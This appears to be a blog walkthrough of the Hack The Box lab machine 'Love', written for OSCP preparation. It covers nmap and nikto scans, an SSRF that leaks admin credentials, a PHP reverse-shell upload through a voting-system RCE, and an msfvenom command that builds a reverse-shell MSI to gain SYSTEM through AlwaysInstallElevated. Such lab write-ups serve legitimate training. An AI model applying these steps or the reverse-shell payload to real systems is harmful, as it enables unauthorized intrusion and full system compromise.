TJ_Null’s OSCP Prep – HTB – Love

Byaghanim

This Windows machine have a SSRF vulnerability. Through SSRF we get credentials to a webserver hosting a voting system, that have a upload RCE that I’ll abuse to get reverse shell. The user have a registery that allows us to install .msi files as NT AUTHORITY\SYSTEM, giving is administrator access.

I’ll start with a NMAP scan. 

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# nmap -p- --min-rate 10000 10.10.10.239 -oN nmap.port          
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 16:09 EST
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.069s latency).
Not shown: 65461 closed tcp ports (reset), 55 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5000/tcp  open  upnp
5040/tcp  open  unknown
5985/tcp  open  wsman
5986/tcp  open  wsmans
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nmap.result                                                                                                                                                                      1 ⨯
# Nmap 7.92 scan initiated Sun Jan 23 16:05:38 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.031s latency).
Not shown: 65015 closed tcp ports (reset), 501 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2022-01-23T21:32:16+00:00; +23m28s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-23T13:32:03-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 2h23m28s, deviation: 4h00m01s, median: 23m27s
| smb2-time: 
|   date: 2022-01-23T21:32:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 16:08:49 2022 -- 1 IP address (1 host up) scanned in 191.40 seconds

I’ll note a couple of things before moving forward.

  • The domain is love.htb.
  • There is also a subdomain staging.love.htb.
  • The webserver allows both HTTP and HTTPS

love.htb

It requires a Voters ID, which I dont have.

staging.love.htb

There is a “Free File Scanner” running on staging.love.htb/beta.php. This is probably vulnerable to SSRF and we could list resources we otherwise wouldnt be allowed to view.

https://love.htb

Vising https gives us a forbidden error.

Before moving forward I like to run nikto scan against the webserver. 

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nikto.result                                                                                                                                                                     4 ⨯
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.239
+ Target Hostname:    10.10.10.239
+ Target Port:        80
+ Start Time:         2022-01-23 16:12:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2022-01-23 16:18:57 (GMT-5) (414 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There is a subdirectory called /admin.

Initial Acces – SSRF

SSRF is when a malicious user cause the webserver to make an additional or edited HTTP request to the resource of the attacker’s choosing. Since we have a couple ports open we could try to make a request to the webserver. After some enumeration I found that making a request to http://127.0.0.1:5000 gives us credentials to voting systems admin panel we found earlier.

After logging in, we are presented with a admin panel.

Shell as Phoebe

Using searchsploit we find that voting system is vulnerable to upload remote code exection.

Looking at the explanation for this RCE, we have to add a candidate and its possible to upload arbritray file when it asks us to upload a photo.

So first we have a to create Position.

Then I’ll add a candidate and upload a PHP reverse shell.

Visiting /images we can see that the payload is uploaded. I’ll start a netcat listener and open the shell.

Shell as NT AUTHORITY\SYSTEM

I’ll use carlospolops winpeas.exe to enumerate possible privilege escalation vectors.

I notice these two lines in the scan.

Reading hacktricks link.

Great, so I’ll create a .msi payload using msfvenom and upload it to the machine. 

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.17 LPORT=5555 -f msi -o rev.msi

After uploading it to the machine, I’ll run the msi payload and start another netcat listener.

What I’ve learned

  • If there is a possible SSRF vulnerabilty try to make a request to internal resources to see if there is anything intersting.
  • Enumerating registry could give us a hint at possible privesc vectors. In this instance Phoebe could install msi file as NT AUTHORITY\SYSTEM.
  • No every reverse shell will work right away. I had to try a couple of times to get the PHP reverse shell to give me a stable connection.

Similar Posts

TJ_Null’s OSCP Prep – HTB – Forest

TJ_Null’s OSCP Prep – HTB – Forest

Byaghanim

This is an Active Directory machine. After enumerating SMB it leaks a list of users. I then used impacket-GetNPUsers to look for users without Kerberos pre-authentication required attribute. There was one user, svc-alfresco, which didnt have kerberos pre-authentication enabled and I got a hash. I cracked the hash using john the ripper, and used Evil-WinRM…

TJ_Null’s OSCP Prep – HTB – Legacy

TJ_Null’s OSCP Prep – HTB – Legacy

Byaghanim

This Windows XP box had two vulnerabilities. MS10-017 (Eternal blue) and MS08-067. I will in this blog post go through both of them without metasploit. For testing purpose I tried using metasploit first to verify that it was actually eternal blue. When manually exploiting the vulnearbilites I used helviojunior’s and areyou1or0 scripts. I had alot…